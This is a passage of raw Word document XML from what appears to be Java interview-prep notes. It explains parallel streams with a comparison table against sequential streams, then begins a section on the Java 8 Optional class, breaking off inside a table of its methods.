      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using multiple threads. It splits the data into chunks and processes them in parallel, leveraging multi-core processors to speed up computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D4C811"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ing parallel streams, you can take advantage of the multi-core architecture of modern CPUs to perform heavy computations more efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430BF237"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Characteristics of Parallel Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58111B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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currency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Parallel streams divide the data into multiple chunks and process them in parallel across multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19950C95" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ork/Join Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Internally, parallel streams use the common </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fork/Join Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for managing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06106675" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 Guarantee of Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since parallel operations are performed concurrently, the order of results is not guaranteed unless the terminal operation explicitly ensures it (e.g., collect() with a sorted comparator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E373E11" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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verhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There can be overhead for splitting and merging data when using parallel streams, so they may not always be faster than sequential streams, especially for smaller data sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6854E86B"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Parallel Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C652D56"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Arrays;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7088F543"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135EDF2" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF63841"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ParallelStreamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8D933"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16114D3A"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC596D" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8F7CA5"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Using a parallel stream to sum the even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD9BCF"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sum = numbers.parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F342E"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filter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1BCB3"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ToInt(Integer::intValue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270FFC3"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um();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410A26C" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D33E71E"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Sum of even numbers: " + sum);  // Output: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B365A97"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F3E33E2"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0596DED"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example, the stream processes the elements in parallel, using multiple threads to compute the sum of even numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAC449"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ifferences between Stream and Parallel Strea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56"/>
        <w:gridCol w:w="2956"/>
        <w:gridCol w:w="3508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="62B9C331" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A8FE48"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7E300138"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ream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12ABC538"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arallel Stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3D3BC208" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B822471"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ocessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ABCBD46"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quential (one thread)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B5DF13"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arallel (multiple threads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="49FD1954" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="388F767D"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72C15B1F"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itable for smaller datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED19990"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itable for larger datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="21CDE7F7" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DC19AA3"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rder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57562100"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intains the order of elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E3CE946"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oes not guarantee the order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="38E0C8C6" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7348B7C8"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47BF77AE"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mple operations, small data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="175F2A27"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avy computations, large data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="52E2E66B" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22832D06"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verhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D62F189"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wer overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D8CAA4" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8"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igher overhead due to parallelization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65AE85FD"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to Use Parallel Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7357230F" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large datasets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or computationally expensive operations where the benefits of parallel processing outweigh the overhead of splitting the data and managing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E8E2B8" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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void parallel streams for smaller datasets or tasks that don't require much computation, as the overhead might actually degrade performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E98D1" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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AB0C82A">
          <v:rect id="_x0000_i1700" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F495A07" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8"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2C0F78B0" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a sequence of elements that can be processed sequentially or in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895CFFA" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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rallel Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizes multi-threading to process data concurrently, offering better performance for large-scale computations, but with added complexity and potential overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6FA521" w14:textId="72F4AEF6" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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DEE1DA9">
          <v:rect id="_x0000_i1701" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66162279" w14:textId="77777777" w:rsidR="002E2A9A" w:rsidRPr="00CE4B95" w:rsidRDefault="002E2A9A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Toc196307711"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Optional class in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w14:paraId="090574F3" w14:textId="4D6B1854" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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at is Optional in Java 8?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316430D2"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ptional is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduced in Java 8, used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>represent the presence or absence of a value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It helps you avoid </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null pointer exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and makes the code more readable and null-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1B803"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nk of it as a box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED2F1F" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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box may </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contain a value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75357E9E" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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may be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no value inside = null equivalent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204762BF" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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505C3D">
          <v:rect id="_x0000_i1702" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA3E9DD" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422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y was Optional introduced?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444FB121"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o reduce the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>risk of NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and encourage </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B23EB"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stead of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADBB8D"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 name = person.getName(); // Might be null -&gt; NPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D00C726"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e do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4B5C1"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ptional&lt;String&gt; name = person.getNameOptional();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D6264"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ame.ifPresent(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18544F6D" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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0EF5206">
          <v:rect id="_x0000_i1703" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577CBCE" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422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How to create an Optional?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD29B6B"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ptional&lt;String&gt; opt1 = Optional.of("Java");         // Non-null value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA11BD5"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ptional&lt;String&gt; opt2 = Optional.empty();            // No value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B58A8D"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ptional&lt;String&gt; opt3 = Optional.ofNullable(null);   // Accepts nulls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77912AB2" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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82A7D0E">
          <v:rect id="_x0000_i1704" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FE8F3" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422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mmon Methods in Optiona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4"/>
        <w:gridCol w:w="4178"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="00D795EC" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E38768A" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
